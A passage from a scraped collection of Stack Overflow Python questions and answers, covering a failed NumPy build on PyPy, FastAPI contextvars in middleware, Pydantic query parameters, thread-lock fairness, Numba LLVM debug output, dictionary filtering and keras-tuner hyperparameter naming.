numpy/_core/lib_simd.dispatch.h_FMA3.a.p/meson-generated__simd.dispatch.c.obj [460/530] Linking static target numpy/_core/lib_simd.dispatch.h_FMA3.a [461/530] Compiling C object numpy/_core/lib_simd.dispatch.h_AVX512F.a.p/meson-generated__simd.dispatch.c.obj [462/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_config.c.obj [463/530] Linking static target numpy/_core/lib_simd.dispatch.h_AVX512F.a [464/530] Linking static target numpy/_core/lib_simd_mtargets.a [465/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_z_lapack.c.obj [466/530] Linking target numpy/_core/_simd.pypy311-pp73-win_amd64.pyd [467/530] Compiling C 
object numpy/random/libnpyrandom.a.p/src_distributions_logfactorial.c.obj [468/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_lapack.c.obj [469/530] Compiling C object numpy/random/libnpyrandom.a.p/src_distributions_random_mvhg_count.c.obj [470/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_c_lapack.c.obj [471/530] Compiling C object numpy/random/libnpyrandom.a.p/src_distributions_random_mvhg_marginals.c.obj [472/530] Compiling C++ object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/umath_linalg.cpp.obj [473/530] Compiling C object numpy/random/libnpyrandom.a.p/src_distributions_random_hypergeometric.c.obj [474/530] Copying file numpy/random/__init__.py [475/530] Compiling C object numpy/random/libnpyrandom.a.p/src_distributions_distributions.c.obj [476/530] Copying file numpy/random/_common.pxd [477/530] Copying file numpy/random/__init__.pxd [478/530] Linking static target numpy/random/libnpyrandom.a [479/530] Copying file numpy/random/bit_generator.pxd [480/530] Generating numpy/random/_bounded_integer_pxd with a custom command [481/530] Generating numpy/random/_bounded_integer_pyx with a custom command [482/530] Copying file numpy/random/c_distributions.pxd [483/530] Copying file numpy/random/_generator.pyx [484/530] Copying file numpy/random/mtrand.pyx [485/530] Compiling C object numpy/random/_mt19937.pypy311-pp73-win_amd64.pyd.p/src_mt19937_mt19937.c.obj [486/530] Compiling C object numpy/random/_mt19937.pypy311-pp73-win_amd64.pyd.p/src_mt19937_mt19937-jump.c.obj [487/530] Compiling C object numpy/random/_philox.pypy311-pp73-win_amd64.pyd.p/src_philox_philox.c.obj [488/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_c_lapack.c.obj [489/530] Compiling C object numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/src_pcg64_pcg64.c.obj [490/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_blas.c.obj [491/530] Compiling C object numpy/random/_sfc64.pypy311-pp73-win_amd64.pyd.p/src_sfc64_sfc64.c.obj [492/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_d_lapack.c.obj [493/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/_pcg64.pyx [494/530] Compiling C object numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/meson-generated_numpy_random__pcg64.pyx.c.obj FAILED: numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/meson-generated_numpy_random__pcg64.pyx.c.obj "cc" "-Inumpy\random\_pcg64.pypy311-pp73-win_amd64.pyd.p" "-Inumpy\random" "-I..\numpy\random" "-I..\numpy\random\src" "-Inumpy\_core" "-I..\numpy\_core" "-Inumpy\_core\include" "-I..\numpy\_core\include" "-I..\numpy\_core\src\common" "-Inumpy" "-IC:\pypy3\Include" "-IC:\Users\semva\AppData\Local\Temp\pip-install-0q1qbetl\numpy_627fd22ca8764d2db937a682f82fea68\.mesonpy-2vaxsk5m\meson_cpu" "-fvisibility=hidden" "-fdiagnostics-color=always" "-DNDEBUG" "-Wall" "-Winvalid-pch" "-std=c11" "-O3" "-fno-strict-aliasing" "-msse" "-msse2" "-msse3" "-DNPY_HAVE_SSE2" "-DNPY_HAVE_SSE" "-DNPY_HAVE_SSE3" "-mlong-double-64" "-D__USE_MINGW_ANSI_STDIO=1" "-DMS_WIN64=" "-D_FILE_OFFSET_BITS=64" "-D_LARGEFILE_SOURCE=1" "-D_LARGEFILE64_SOURCE=1" "-DNPY_NO_DEPRECATED_API=0" "-U__GNUC_GNU_INLINE__" -MD -MQ numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/meson-generated_numpy_random__pcg64.pyx.c.obj -MF 
"numpy\random\_pcg64.pypy311-pp73-win_amd64.pyd.p\meson-generated_numpy_random__pcg64.pyx.c.obj.d" -o numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/meson-generated_numpy_random__pcg64.pyx.c.obj "-c" numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/numpy/random/_pcg64.pyx.c numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/numpy/random/_pcg64.pyx.c:14014:12: fatal error: internal/pycore_frame.h: No such file or directory 14014 | #include "internal/pycore_frame.h" | ^~~~~~~~~~~~~~~~~~~~~~~~~ compilation terminated. [495/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/_mt19937.pyx [496/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_s_lapack.c.obj [497/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/_philox.pyx [498/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/_sfc64.pyx [499/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_z_lapack.c.obj [500/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/bit_generator.pyx [501/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_d_lapack.c.obj [502/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_blas.c.obj [503/530] Compiling Cython source numpy/random/_bounded_integers.pyx [504/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_s_lapack.c.obj [505/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/_common.pyx [506/530] Compiling C++ object numpy/fft/_pocketfft_umath.pypy311-pp73-win_amd64.pyd.p/_pocketfft_umath.cpp.obj [507/530] Compiling Cython source numpy/random/_generator.pyx ninja: build stopped: subcommand failed. INFO: autodetecting backend as ninja INFO: calculating backend command to run: C:\Users\semva\AppData\Local\Temp\pip-build-env-3vh8v_of\normal\Scripts\ninja.EXE [end of output] note: This error originates from a subprocess, and is likely not a problem with pip. error: metadata-generation-failed ├ù Encountered error while generating package metadata. Ôò░ÔöÇ> See above for output. note: This is an issue with the package mentioned above, not pip. hint: See above for details. --end of error-- When trying to install numpy with Python 3.11 (without PyPy), it gets installed without errors. Software information: pypy --version: [PyPy 7.3.19 with MSC v.1941 64 bit (AMD64)] os: Windows 11 24H2 | There are wheels for the next NumPy version available on anacoda.org, you can use them with ` pip install -i https://pypi.anaconda.org/scientific-python-nightly-wheels/simple numpy | 1 | 2 |
79,547,496 | 2025-4-1 | https://stackoverflow.com/questions/79547496/use-greater-equal-less-comparison-result-as-dictionary-key | Is there a clean way to store the values comparison result as dictionary key, naming >, =, and < (not the str format, but the state of "greater" for example). Curious if this could be a way to replace wordy if a > b: print(f'{a} > {b}') elif a == b: print(f'{a} = {b}') else: print(f'{a} < {b}') with a dict d = { >: '{a} > {b}', # > is something I don't know how to use, not str('>') =: '{a} = {b}', <: '{a} < {b}', } Then I can use it like compare_result = a > b # I know this returns boolean; I need a way to return a comparison result in one of {>, =, <} print(d[compare_result].format(a, b)) something like that. | The operator module contains actual function objects for greater-than, less-than, equal, etc. import operator d = { operator.gt: '{a} > {b}', operator.eq: '{a} = {b}', operator.lt: '{a} < {b}', } | 1 | 1 |
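To round out the answer above, here is one way the operator-keyed dictionary can be used for dispatch. This is a small sketch; the describe helper is not from the original question.

import operator

messages = {
    operator.gt: "{a} > {b}",
    operator.eq: "{a} = {b}",
    operator.lt: "{a} < {b}",
}

def describe(a, b):
    # try each comparison in turn and format the first one that holds
    for op, template in messages.items():
        if op(a, b):
            return template.format(a=a, b=b)

print(describe(3, 2))  # 3 > 2
print(describe(2, 2))  # 2 = 2
print(describe(1, 2))  # 1 < 2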
79,565,969 | 2025-4-10 | https://stackoverflow.com/questions/79565969/importerror-when-importing-numpy-missing-libgfortran-5-dylib-on-macos-vs-code | I’m working on macOS Sequoia 15.4, using VS Code and Jupyter Notebooks with Conda environments. Everything worked fine until yesterday. Now, when I try to run any of my existing environments, importing NumPy or other scientific libraries results in the following ImportError related to libgfortran.5.dylib. ImportError: dlopen(..._multiarray_umath.cpython-39-darwin.so): Library not loaded: @rpath/libgfortran.5.dylib Referenced from: /Users/.../miniconda3/envs/PARESIS/lib/libopenblasp-r0.3.21.dylib Reason: tried: '/Users/.../libgfortran.5.dylib' (duplicate LC_RPATH '@loader_path'), '/usr/local/lib/libgfortran.5.dylib' (no such file), '/usr/lib/libgfortran.5.dylib' (no such file, not in dyld cache) This ends with: ImportError: Error importing numpy: you should not try to import numpy from its source directory; please exit the numpy source tree, and relaunch your python interpreter from there. This happens only in older environments. If I create a new Conda environment, everything works fine. I tried reinstalling NumPy using conda install numpy --force-reinstall , and also explicitly installing libgfortran=5 in the affected environment. I also updated Conda, restarted my system, and relaunched VS Code multiple times. I expected NumPy to be reinstalled correctly and the missing library issue to be resolved, but the error persists. I was hoping to avoid recreating all my environments from scratch since I have a lot of dependencies already configured. | As mentioned previously, this is similar to this question. MacOS Sequoia 15.4.1 update raises an error for duplicate R paths, which triggers the error you mentioned for typically 'old' environments. If you don't want to re-create an environment, you can try to install libgfortran5 package to its version which avoids the error (>=14), e.g. run this command with your environment activated: conda install "libgfortran5>=14" It should fix the error without having to reinstall everything, assuming the version is compatible with other dependancies and that it's the only one causing the error. | 1 | 5 |
79,573,221 | 2025-4-14 | https://stackoverflow.com/questions/79573221/keep-context-vars-values-between-fastapi-starlette-middlewares-depending-on-the | I am developing a FastAPI app, and my goal is to record some information in a Request scope and then reuse this information later in log records. My idea was to use context vars to store the "request context", use a middleware to manipulate the request and set the context var, and finally use a LogFilter to attach the context vars values to the LogRecord. This is my app skeleton logger = logging.getLogger(__name__) app = FastAPI() app.add_middleware(SetterMiddlware) app.add_middleware(FooMiddleware) @app.get("/") def read_root(setter = Depends(set_request_id)): print("Adding req_id to body", req_id.get()) # This is 1234567890 logging.info("hello") return {"Req_id": str(req_id.get())} and those are my middlewares class SetterMiddlware(BaseHTTPMiddleware): async def dispatch(self, request: Request, call_next): calculated_id = "1234567890" req_id.set(calculated_id) request.state.req_id = calculated_id response = await call_next(request) return response class FooMiddleware(BaseHTTPMiddleware): async def dispatch(self, request: Request, call_next): response = await call_next(request) return response and the Logging Filter from vars import req_id class CustomFilter(Filter): """Logging filter to attach the user's authorization to log records""" def filter(self, record: LogRecord) -> bool: record.req_id = req_id.get() return True And finally following a part of my log configuration ... "formatters": { "default": { "format": "%(levelname)-9s %(asctime)s [%(req_id)s]| %(message)s", "datefmt": "%Y-%m-%d,%H:%M:%S", }, }, "handlers": { ... "handlers": { "console": { "class": "logging.StreamHandler", "formatter": "default", "stream": "ext://sys.stderr", "filters": [ "custom_filter", ], "level": logging.NOTSET, }, ... "loggers": { "": { "handlers": ["console"], "level": logging.DEBUG, }, "uvicorn": {"handlers": ["console"], "propagate": False}, }, When SetterMiddlware is the latest added in the app (FooMiddleware commented in the example), my app logs as expected Adding req_id to body 1234567890 INFO 2025-04-14,15:02:28 [1234567890]| hello INFO 2025-04-14,15:02:28 [1234567890]| 127.0.0.1:52912 - "GET / HTTP/1.1" 200 But if I add some other middleware after SetterMiddlware, uvicorn logger does not find anymore the context_var req_id set. Adding req_id to body 1234567890 INFO 2025-04-14,15:03:56 [1234567890]| hello INFO 2025-04-14,15:03:56 [None]| 127.0.0.1:52919 - "GET / HTTP/1.1" 200 I tried using the package https://starlette-context.readthedocs.io/en/latest/ but I wasn't luckier; it looks like it suffers the same problems. I would like to know why this behavior happens and how I can fix it, without the constraint of having the SetterMiddleware in the last middleware position. | Currently dealing with a similar setup and I spent some time digging.. I'm not sure if this truly answers the why in your question but what I found is that if I use a custom middleware class without inheriting from BaseHTTPMiddleware (à la Pure ASGI Middleware) the context variables get propagated correctly to the uvicorn access logger. This might have something to do with the known starlette BaseHTTPMiddleware limitation of not propagating contextvars "upwards". IIRC there are also some raised anyio issues related to contextvars... 
So the solution would be along the lines of: from starlette.types import ASGIApp, Receive, Scope, Send class SetterMiddlware: def __init__(self, app: ASGIApp) -> None: self.app = app async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None: calculated_id = "1234567890" req_id.set(calculated_id) request = Request(scope, receive) request.state.req_id = calculated_id response = await self.app(scope, receive, send) return response class FooMiddleware: def __init__(self, app: ASGIApp) -> None: self.app = app async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None: response = await self.app(scope, receive, send) return response | 2 | 1 |
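A condensed sketch of the pattern the answer describes: a ContextVar set in a pure-ASGI middleware plus the logging filter that reads it. The names (RequestIdMiddleware, RequestIdFilter) and the hard-coded id are illustrative, not from the original code.

import contextvars
import logging

req_id = contextvars.ContextVar("req_id", default=None)

class RequestIdMiddleware:
    # pure ASGI middleware (no BaseHTTPMiddleware), so the ContextVar value
    # remains visible to route handlers and to log records emitted later
    def __init__(self, app):
        self.app = app

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http":
            req_id.set("1234567890")  # compute the real request id here
        await self.app(scope, receive, send)

class RequestIdFilter(logging.Filter):
    def filter(self, record):
        record.req_id = req_id.get()
        return True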
79,573,908 | 2025-4-14 | https://stackoverflow.com/questions/79573908/openai-assistants-with-citations-like-42-source-and-citeturnxfiley | When streaming with OpenAI Assistants openai.beta.threads.messages.create( thread_id=thread_id, role="user", content=payload.question ) run = openai.beta.threads.runs.create( thread_id=thread_id, assistant_id=assistant_id, stream=True, tool_choice={"type": "file_search"}, ) streamed_text = "" for event in run: if event.event == "thread.message.delta": delta_content = event.data.delta.content if delta_content and delta_content[0].type == "text": text_fragment = delta_content[0].text.value streamed_text += text_fragment yield {"data": text_fragment} if event.event == "thread.run.completed": break the citations are coming in the formats like 【4:2†source】 or citeturnXfileY How to fix it? | The approach I've used was to get the final message after streaming messages = openai.beta.threads.messages.list(thread_id=thread_id) and then apply the following regex def replace_placeholder(match): nonlocal citation_index citation_index += 1 return f"[{citation_index}]" pattern = r"(citeturn\d+file\d+|【\d+:\d+†.*?】)" citation_index = 0 assistant_reply_cleaned = re.sub(pattern, replace_placeholder, raw_text) to replace the placeholders (like 【4:2†source】 or citeturnXfileY) with [1], [2], etc | 1 | 1 |
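A self-contained demo of that substitution on a made-up string; it uses itertools.count in place of the nonlocal counter but applies the same regex:

import itertools
import re

raw_text = "First claim 【4:2†source】 and second claim 【4:0†source】."
pattern = r"(citeturn\d+file\d+|【\d+:\d+†.*?】)"

counter = itertools.count(1)
cleaned = re.sub(pattern, lambda m: f"[{next(counter)}]", raw_text)
print(cleaned)  # First claim [1] and second claim [2].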
79,572,368 | 2025-4-14 | https://stackoverflow.com/questions/79572368/parsing-pydantic-dict-params | I have an endpoint that takes a Pydantic model, Foo, as a query parameter. from typing import Annotated import uvicorn from fastapi import FastAPI, Query from pydantic import BaseModel app = FastAPI() class Foo(BaseModel): bar: str baz: dict[str, str] @app.get("/") def root(foo: Annotated[Foo, Query()]): return foo if __name__ == "__main__": uvicorn.run("test:app") I'm defining my query params using Swagger, so the encoding should be correct. I know the baz param syntax looks redundant because I've nested a dictionary, but parsing fails even without nesting. But when I call the endpoint... curl -X 'GET' \ 'http://127.0.0.1:8000/?bar=sda&baz=%7B%22abc%22%3A%22def%22%7D' \ -H 'accept: application/json' FastAPI does not seem to read in Foo.baz correctly, returning { "detail": [ { "type": "dict_type", "loc": [ "query", "baz" ], "msg": "Input should be a valid dictionary", "input": "{\"abc\":\"def\"}" } ] } I've read similar questions and I know I can ingest the dictionary by accessing dict(request.query_params), but this bypasses FastAPI's validation and I'd prefer to keep the endpoint simple and consistent with the rest of my codebase by keeping the param as a Pydantic model. How can I get FastAPI to parse Foo as a query param? | It is indeed a complex subjects for which I see mainly 2 paths forward. Parse your dictionary from the query It is actually possible to get the dictionary back from the query parameters: from pydantic import BaseModel, Json class Foo(BaseModel): bar: str baz: Json When baz will receive the Json string, it will be parsed into a dictionary. This method changes the openapi schema, so swagger will render baz as a file input. openapi schema: "parameters": [ {"name": "bar",...}, { "name": "baz", "in": "query", "required": true, "schema": { "type": "string", "contentMediaType": "application/json", "contentSchema": {}, "title": "Baz" } } ] swagger rendering: If swagger is important to you, you can use your custom Json loader type that will render as a textarea: from typing import Annotated import json from pydantic import BaseModel, Json, BeforeValidator CustomJsonValidator = Annotated[dict[str, str], BeforeValidator(json.loads)] class Foo(BaseModel): bar: str baz: CustomJsonValidator The associated openapi schema will be: "parameters": [ {"name": "bar", ...}, { "name": "baz", "in": "query", "required": true, "schema": { "type": "object", "additionalProperties": { "type": "string" }, "title": "Baz" } } ] and swagger will render like the following: Explicit all of the filters If possible, you can explicit all of your filters in a pydantic schema (a bit like flattening out baz dictionary). It can avoid potential issue since it's way harder to validate a dictionary than fields. Of course, you will have to use None by defaults a bit everywhere, but you can always exclude them from your model dumping. from typing import Literal from pydantic import BaseModel class Foo(BaseModel): bar: str abc: Literal["def"] | None = None ghi: str | None = None jkl: int | None = None If you have filters that can't be used together, you can use pydantic unions for that. Let's say "abc" and "ghi" filters must always coexist, but can't be defined along with "jkl". 
You would have: from typing import Literal from pydantic import BaseModel class GoodLuckNamingThat(BaseModel): bar: str abc: Literal["def"] ghi: str class AnotherNamingNightmare(BaseModel): bar: str jkl: int @app.get("/") def root(foo: Annotated[GoodLuckNamingThat | AnotherNamingNightmare, Query()]): return foo | 1 | 3 |
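An end-to-end sketch of the Json-field approach above, assuming a FastAPI version that accepts Pydantic models annotated with Query (as in the question) and httpx installed for the TestClient; the expected output comment is an assumption about the default Json serialization behaviour.

from typing import Annotated
from fastapi import FastAPI, Query
from fastapi.testclient import TestClient
from pydantic import BaseModel, Json

app = FastAPI()

class Foo(BaseModel):
    bar: str
    baz: Json[dict[str, str]]   # parses the JSON string from the query into a dict

@app.get("/")
def root(foo: Annotated[Foo, Query()]):
    return foo

client = TestClient(app)
resp = client.get("/", params={"bar": "sda", "baz": '{"abc": "def"}'})
print(resp.json())  # expected: {'bar': 'sda', 'baz': {'abc': 'def'}}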
79,571,481 | 2025-4-13 | https://stackoverflow.com/questions/79571481/get-current-function-name | Executing vscode.executeDocumentSymbolProvider gives me all symbols in the file. Can I somehow get the name of the function that the cursor is currently in? | If you only want the top-most outer function that the cursor is in, then the answer is fairly straightforward. If you wanted to consider multiple nested functions then it gets much trickier. Scan through the symbols, finding the symbol whose range contains the cursor: const symbols = await vscode.commands.executeCommand('vscode.executeDocumentSymbolProvider', document.uri); const targetSymbol = Object.values(symbols).find(childSymbol => { return childSymbol.kind === vscode.SymbolKind.Function && childSymbol.range.contains(selection.active); }); The childSymbols will be all the top-level symbols in your document. | 1 | 1 |
79,573,420 | 2025-4-14 | https://stackoverflow.com/questions/79573420/should-i-always-use-asyncio-lock-for-fairness | I have a Python service that uses Python's virtual threads (threading.Thread) to handle requests. There is a shared singleton functionality that all threads are trying to access, which is protected using threading.Lock. g_lock = threading.Lock() def my_threaded_functionality(): try: g_lock.acquire() # ... Do something with a shared resource ... finally: g_lock.release() In the docs of threading.Lock.acquire, there is no mentioning of fairness, whereas, in asyncio's asyncio.Lock.acquire, they mention that the lock is fair. As I want to prevent starvation of threads, and want to preserve the order of the tasks the same as they have arrived, I would go for asyncio's Lock if they didn't mention that the locks are not thread safe. The question is whether it should be an issue also with Python's virtual "threads". | Python's virtual threads (threading.Thread) CPython threads are native threads, not virtual threads, the concept of virtual threads doesn't exist in CPython. asyncio's Lock is not thread-safe, you cannot use it for multithreaded synchronization, only threading.Lock is safe for multithreaded access. you can serialize access to this resource with a threadpool of 1 thread, it has a queue internally and guarantees fairness (first-in-first-out), don't use locks. as a bonus you can use loop.run_in_executor to await it in your eventloops. my_pool = concurrent.futures.ThreadPoolExecutor(max_workers=1) def non_thread_safe_task(): return "not thread-safe" async def my_threaded_functionality_async(): my_loop = asyncio.get_running_loop() result = await my_loop.run_in_executor(my_pool, non_thread_safe_task) def my_threaded_functionality(): result = my_pool.submit(non_thread_safe_task).result() concurrent.futures.ThreadPoolExecutor spawns threads lazily, so it is okay to have it in the global scope, it doesn't create a thread if it is not used, but i'd rather wrap the whole thing in a class. Note: sending work to other threads and back adds roughly 10-50 microseconds of latency, only use it if you must guarantee order, otherwise just use a threading.Lock g_lock = threading.Lock() def my_threaded_functionality(): with g_lock: # ... Do something with a shared resource ... there's also an async version to lock threading.Lock in an eventloop (which also has this extra 10-50 microseconds of overhead ... , i'd probably use the 1 worker thread_pool if you are in async code, that's also multithreaded) | 1 | 1 |
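A tiny sketch illustrating the fairness point above: a one-worker ThreadPoolExecutor runs submissions strictly first-in-first-out, so task order is preserved without an explicit lock.

import concurrent.futures

pool = concurrent.futures.ThreadPoolExecutor(max_workers=1)
order = []

def task(i):
    order.append(i)  # only ever touched by the single worker thread

futures = [pool.submit(task, i) for i in range(5)]
concurrent.futures.wait(futures)
print(order)  # [0, 1, 2, 3, 4]: the lone worker drains its queue in submission order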
79,567,168 | 2025-4-10 | https://stackoverflow.com/questions/79567168/how-can-i-get-llvm-loop-vectorization-debug-output-in-numba | I'm trying to view LLVM debug messages for loop vectorization using Numba and llvmlite. I want to see the loop vectorization "LV:" debug output (e.g., messages like LV: Checking a loop in ...) so I can analyze the vectorization decisions made by LLVM. https://numba.readthedocs.io/en/stable/user/faq.html#does-numba-vectorize-array-computations-simd I'm using a conda environment with the following YAML file. This makes sure I’m using the llvmlite build from the numba channel (which should have LLVM built with assertions enabled): name: numbadev channels: - defaults - numba dependencies: - python>=3.12.9 - numba::numba - numba::llvmlite - intel-cmplr-lib-rt Running conda list shows: # Name Version Build Channel python 3.13.2 hf623796_100_cp313 llvmlite 0.44.0 py313h84b9e52_0 numba numba 0.61.2 np2.1py3.13hf94e718_g1e70d8ceb_0 numba ... This is my script debug_loop_vectorization.py: import llvmlite.binding as llvm llvm.set_option('', '--debug-only=loop-vectorize') import numpy as np from numba import jit @jit(nopython=True, fastmath=True) def test_func(a): result = 0.0 for i in range(a.shape[0]): result += a[i] * 2.0 return result # Trigger compilation. a = np.arange(1000, dtype=np.float64) test_func(a) # Print the LLVM IR print(test_func.inspect_llvm(test_func.signatures[0])) When I run the script from a Linux terminal I see the LLVM-IR but no lines starting with "LV:...". How can I get LLVM loop vectorization debug output? Edit: I've tried to call the script from the Linux terminal like this: conda activate numbadev cd /PathToMyFile/ python debug_loop_vectorization.py or like this: LLVM_DEBUG=1 python debug_loop_vectorization.py 2>&1 | grep '^LV:' Edit: In llvmlite/conda-recipes/llvmdev, bld.bat contains a cmake argument "DLLVM_ENABLE_ASSERTIONS=ON". https://github.com/numba/llvmlite/blob/main/conda-recipes/llvmdev/bld.bat#L32 build.sh doesn't contain "_cmake_config+=(-DLLVM_ENABLE_ASSERTIONS:BOOL=ON)" anymore. https://github.com/numba/llvmlite/blob/main/conda-recipes/llvmdev/build.sh Edit: LLVM debug messages have been disabled in the Linux build unintentionally and should be enabled in LLVMlite v0.45.0 on the Numba channel. | On Linux, a workaround solution for tests is to use Numba 0.60.0. Indeed, it is based on LLVMlite v0.43.0 which is build with an LLVM version having assertions. On Linux, newer versions (e.g. Numba 0.61.2 and LLVMlite v0.44.0) do not embed an LLVM supporting assertions (apparently due to a code cleaning). Thus it must be build manually with . One solution with newer version is to recompile LLVMlite and its embedded LLVM locally so assertions are enabled. This can be done by setting -DLLVM_ENABLE_ASSERTIONS:BOOL=ON in CMAKE_ARGS before the build. Alternatively, you can add this line in the conda-recipes/llvmdev/build.sh file. On Windows, this works well by default so far. There is nothing to do. | 1 | 2 |
79,573,449 | 2025-4-14 | https://stackoverflow.com/questions/79573449/removing-elements-based-on-nested-dictionary-values | I have a complex nested dictionary structure and I need to remove elements based on the values in a nested dictionary. My dictionary looks like this: my_dict = { 'item1': {'name': 'Apple', 'price': 1.0, 'category': {'id': 1, 'name': 'Fruit'}}, 'item2': {'name': 'Banana', 'price': 0.5, 'category': {'id': 1, 'name': 'Fruit'}}, 'item3': {'name': 'Carrot', 'price': 0.75, 'category': {'id': 2, 'name': 'Vegetable'}}, 'item4': {'name': 'Broccoli', 'price': 1.5, 'category': {'id': 2, 'name': 'Vegetable'}} } I want to filter this dictionary to only include items belonging to the 'Fruit' category. I tried the following code: new_dict = {} for key, value in my_dict.items(): if value['category']['name'] == 'Fruit': new_dict[key] = value print(new_dict) This works, but I'm wondering if there's a more concise or Pythonic way to achieve this, perhaps using dictionary comprehension or a filtering function like filter(). | As a dictionary comprehension A dictionary comprehension can be used to create dictionaries from arbitrary key and value expressions. new_dict2 = { key: value for key, value in my_dict.items() if value['category']['name'] == 'Fruit' } new_dict2 == new_dict # True Using filter() The filter() function is used to: Construct an iterator from those elements of iterable for which function is true. The dict.items() returns an iterable where each element is a tuple of length 2. We can supply each item to a lambda function, where item[0] will be the key and item[1] the value. filter() returns an iterator of the tuples which match the condition. We can wrap this in dict() to get a dictionary (in the same way that dict([("key1", "value1"), ("key2", "value2")]) returns {'key1': 'value1', 'key2': 'value2'}). new_dict3 = dict( filter( lambda item: item[1]['category']['name'] == 'Fruit', my_dict.items() ) ) new_dict3 == new_dict # True Most Pythonic way Achieving the nebulous goal of Pythonicness (Pythonicity?) is always somewhat subjective. I think a dictionary comprehension is clean and neat but it can be hard to see what it's doing, especially if the dict is deeply nested or the condition is complex. It's probably clearest if you wrap it in an appropriately-named function so you can see what's going on. I've added type annotations for clarity: def find_fruit(d: dict[str, dict]) -> dict[str, dict]: def is_fruit(key: str, value: dict) -> bool: return value["category"]["name"] == "Fruit" return {key: value for key, value in d.items() if is_fruit(key, value)} fruit_dict = find_fruit(my_dict) new_dict == fruit_dict # True This is fundamentally the same as the first approach but easier on the eyes. | 7 | 6 |
79,574,127 | 2025-4-14 | https://stackoverflow.com/questions/79574127/cannot-see-all-dense-layer-info-from-search-space-summary-when-using-rand | I am trying to use keras-tuner to tune hyperparameters, like !pip install keras-tuner --upgrade import keras_tuner as kt from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, Flatten from tensorflow.keras.optimizers import Adam def build_model(hp): model = Sequential([ Flatten(input_shape=(28, 28)), Dense(units= hp.Int('units', min_value = 16, max_value = 64, step = 16), activation='relu'), Dense(units = hp.Int('units', min_value = 8, max_value = 20, step = 2), activation='softmax') ]) model.compile( optimizer=Adam(learning_rate=hp.Float('learning_rate', min_value=1e-4, max_value=1e-2, sampling='LOG')), loss='sparse_categorical_crossentropy', metrics=['accuracy'] ) return model # Create a RandomSearch Tuner tuner = kt.RandomSearch( build_model, objective='val_accuracy', max_trials=10, executions_per_trial=2 ) # Display a summary of the search space tuner.search_space_summary() shows Search space summary Default search space size: 2 units (Int) {'default': None, 'conditions': [], 'min_value': 16, 'max_value': 64, 'step': 16, 'sampling': 'linear'} learning_rate (Float) {'default': 0.0001, 'conditions': [], 'min_value': 0.0001, 'max_value': 0.01, 'step': None, 'sampling': 'log'} However, when checking the search_space_summary() output, only the 1st Dense layer is shown in the summary, while the information about the 2nd Dense layer, i.e., Dense(units = hp.Int('units', min_value = 8, max_value = 20, step = 2), activation='softmax'), is not seen. Did I misconfigured something or it is supposed to yield the output like that? Could anyone help me to understand why it outputs the summary like this? | Each hyperparameter must have a unique name. This is also listed in the docs. In your case, both layer units parameters are called units . You should rename them to something like units_1 and units_2, for example. | 2 | 2 |
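The question's build_model with the fix applied; the only change is giving the two Dense layers distinct hyperparameter names (units_1 and units_2 are illustrative choices):

import keras_tuner as kt
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten
from tensorflow.keras.optimizers import Adam

def build_model(hp):
    model = Sequential([
        Flatten(input_shape=(28, 28)),
        Dense(units=hp.Int('units_1', min_value=16, max_value=64, step=16), activation='relu'),
        Dense(units=hp.Int('units_2', min_value=8, max_value=20, step=2), activation='softmax'),
    ])
    model.compile(
        optimizer=Adam(learning_rate=hp.Float('learning_rate', min_value=1e-4, max_value=1e-2, sampling='LOG')),
        loss='sparse_categorical_crossentropy',
        metrics=['accuracy'],
    )
    return model

tuner = kt.RandomSearch(build_model, objective='val_accuracy', max_trials=10, executions_per_trial=2)
tuner.search_space_summary()  # now lists units_1, units_2 and learning_rate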
